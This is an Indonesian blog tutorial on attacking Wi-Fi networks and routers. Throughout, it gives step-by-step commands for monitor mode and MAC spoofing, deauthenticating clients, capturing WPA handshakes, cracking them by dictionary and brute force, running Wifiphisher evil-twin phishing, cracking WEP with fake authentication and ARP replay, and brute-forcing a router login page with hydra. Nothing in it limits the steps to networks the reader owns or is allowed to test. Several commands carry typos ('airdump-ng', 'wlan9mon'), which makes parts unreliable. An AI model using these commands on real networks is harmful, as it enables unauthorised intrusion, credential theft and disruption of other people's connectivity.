Wifi Hacking and Router Dictionary Attack
| Ilustrasi |
Saya akan membagikan cara untuk tutorial Wifi Tester.
Pertama, kita akan mempelajari dasarnya dengan perintah "ifconfig" cara ini adalah melihat settingan interface dan dapat konfigurasi.
Kita akan menggunakan wlan0 (keseringan) namun kalian perlu ingat, membutuhkan adapter khusus yang bisa melihat packet dan inject packet untuk melakukan hal ini, kalian bisa membeli ini dimana pun.
Saya akan melihat info tentan wlan0 dengan memasukan perintah ini "ifconfig wlan0" , kalian juga bisa memasukan perintah "iwconfig" untuk melihat settingan.
Oke setelah itu kita akan mempelajari mengaktifkan monitor mode, secara dasar monitor mode mengizinkan kita melihat semua data, kalau kita masih promiscuous mode (default / managed) kalian bisa lihat ini dengan memberikan perintah "iwconfig" untuk melihat apakah itu managed mode atau tidak.
Namun sebelum kita membuat jadi monitor mode, terkadang ada beberapa software yang membuat monitor mode menjadi managed mode lagi, oleh karena itu kita harus terminasi mereka dengan perintah ini "airmon-ng check kill".
Sekarang kita buat wlan0 menjadi monitor mode dengan perintah "airmon-ng start wlan0" maka akan ada interface lain bernama wlan0mon.
Nah sekarang kita akan belajar sniffing packet, kita bisa menggunakan Wireshark pilih interface monitor mode mu (kalau saya adalah wlan0mon), saya akan membuat tutorialnya lain kali.
Kalau kalian ingin menjadi managed mode lagi kalian tinggal memasukan perintah ini "airmon-ng stop wlan0mon" namun kalian gak bisa konek karena service nya tadi udah dimatikan, kalian bisa menghidupkan nya lagi dengan memasuk perintah ini "service network-manager start".
Namun saya masih ingin monitor mode, oke kali ini kita akan sniffing dengan command line, dengan memasukan perintah "airdump-ng wlan0mon".
BSSID = Mac Address dari Access Point
PWR = kekuatan sinyal yang dilaporkan NIC
RXQ = kualitas (dihitung dengan beberapa packet yang diterima dalam 10 detik)
Beacon = AP kadang ngasih beacon agar bisa terdeteksi oleh komputer Anda.
CH = Channel yang digunakan AP
Setelah ini saya akan setting ulang lagi pada posisi awal.
Oke, kali ini kita akan melihat cara spesifik sniffing juga mengubah mac. Untuk itu kita perlu mematikan terlebih dahulu interface kita dengan perintah "ifconfig wlan0down" kemudian ketikan lagi perintah "macchanger -r wlan0", setelah itu kita akan mendapatkan MAC Address baru (secara random).
Pada dasarnya Mac Address itu ada di hadware dan tidak bisa diubah, namun kita bisa memanipulasi dari sistem operasinya yang mengsavernya sehingga kita mengubah settingannya.
Sekarang kita akan siap-siap mengubah lagi menjadi monitor mode dengan perintah "airmon-ng check kill" kemudian "airmon-ng start wlan0".
Kali ini kita akan segera mendapatkan spesifikasi BSSID ketikan perintah "airodump-ng - -bssid wlan0mon".
Nah, sekarang kita akan bahas deauthentication attack.
Hal yang perlu kita butuhkan itu BSSID CH SSID dan juga MAC target (kalau semuanya gak perlu)
ketikan perintah:
"aireplay-ng -0 0 -a BSSID -c MAC_target wlan9mon"
Sehingga itu yang diperlukan untuk melakukan deauthentication attack.
Setelah itu kita akan belajar cara menangkap 4 way handshake, pertama pastikan kalian sudah di monitor mode.
Kedua kalian masukan perintah "airodump-ng -bssid (BSSID) - -channel (CH) - -write (Save As) wlan0mon"
yang saya akan masukan adalah"
"Airodump-ng - -bssid AA:AA:AA:AA:AA:AB - -channel 1 - -write desktop/wifi wlan0mon"
Kemudian kalian tinggal deauthentication attack terus airodump-ng akan ada tulisan captured handshake, kemudian berhentikan dan lihat akan ada file baru ditempat yang kalian namain, mudah bukan?.
Kali ini kita akan bahas beberapa penyerangan.
- Dicionary Attack
- Bruteforce Attack
- Wifi Phiser
- WEP cracking
- WPS cracking
File saya bernama wifi-01.cap
Wordlist sudah ada di kali linux di "usr/share/wordlists" (di unzip dahulu)
Dictionary Attack : aircrack-ng
Kita tinggal masukan ini:
"Aircrack-ng desktop/wifi-01.cap -w (wordlist)".
Brute Force
"Crunch 1 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng desktop/wifi-01.cap -w-"
Penjelasan:
Angka 1 pada crunch menunjukan dia mencoba dari hanya 1 karakter, angka 8 menunjukan 8 karakter, hingga crunch mencoba dari 1 sampai 8 karakter, sedangkan abcd.....789 adalah karakter yang digunakan, sisanya ganti saja cap file sedangkan pada "-w" kasih "-" lagi pada akhirnya jadi "-w-".
Wifiphiser
Anda membutuhkan dua adapter untuk ini saya menggunakan interface wlan0 dari wlan1.
Ketikan perintah "python wifiphiser -jI wlan0 aI wlan1"
Anda melihat di video gak ada ini? Karena wifiphiser melihat mana interface terkuat untuk jadi jI (Jamming Interface) dan kedua terkuat untuk jadi aI (AP Interface), Anda tentu memerlukan 2 interface.
Kemudian ada list, kalo perlu memasukan Ctrl+c kemudian pilih SSID dan tunggu sudah. :)
Nah, WEP caranya gak beda jauh namun kita gak gunakan deauthentication attacknamun kita menggunakan "fake authentication" dan "arp replay".
ketika airodump-ng melakukan spesified sniffing kita akan gunakan 2 ini (bukan deauth attack) pertama fake authentication, mengapa perlu? Karena tanpanya kita gak bisa ngespam data (arp replay).
Dengan perintah:
"Aireplay-ng -1 0 -a (BSSID) -h (mac Anda) -e (essid) wlan0mon"
Setelah itu bila ada tulisan association successful maka berhasil kalau tulisannya deauth kaya gitu, artinya gagal.
Setelah itu lakukan arp replay (agar bisa di decode)
Aireplay-ng -3 0 -b (bssid) -h (macAnda) wlan0mon kemudian selesai.
Tinggal bajak dengan aircrack-ng
Aircrack-ng -b (bssid) (cap file)
Router Hacking
Dictionary using hydra syntax:
Hydra http://[192.168.0.1]/login.html -e ns -F -V -t 4 -L (list username) -P (list password)
Kalau ip pakai "[]" karena nanti bingung kalau 1 username pakai lowercase L "l" kalau 1 password pakai lowercase P "p" -f kalau udah berhenti -v menunjukan hasil terminal.
Sekian dan terimakasih saya rasa penjelasan (teori) Wifi Hacking an Router Dictionary Attack.
Jika ada kesalahan atau kekurangan mohon di perbaiki dan di maafkan. Coz I'm just human being:)
0 Comments
We welcome relevant and respectful comments. Irrelevant Comments, Comment Spam, Off-topic comments may be removed.
Please read our Comment Policy before commenting.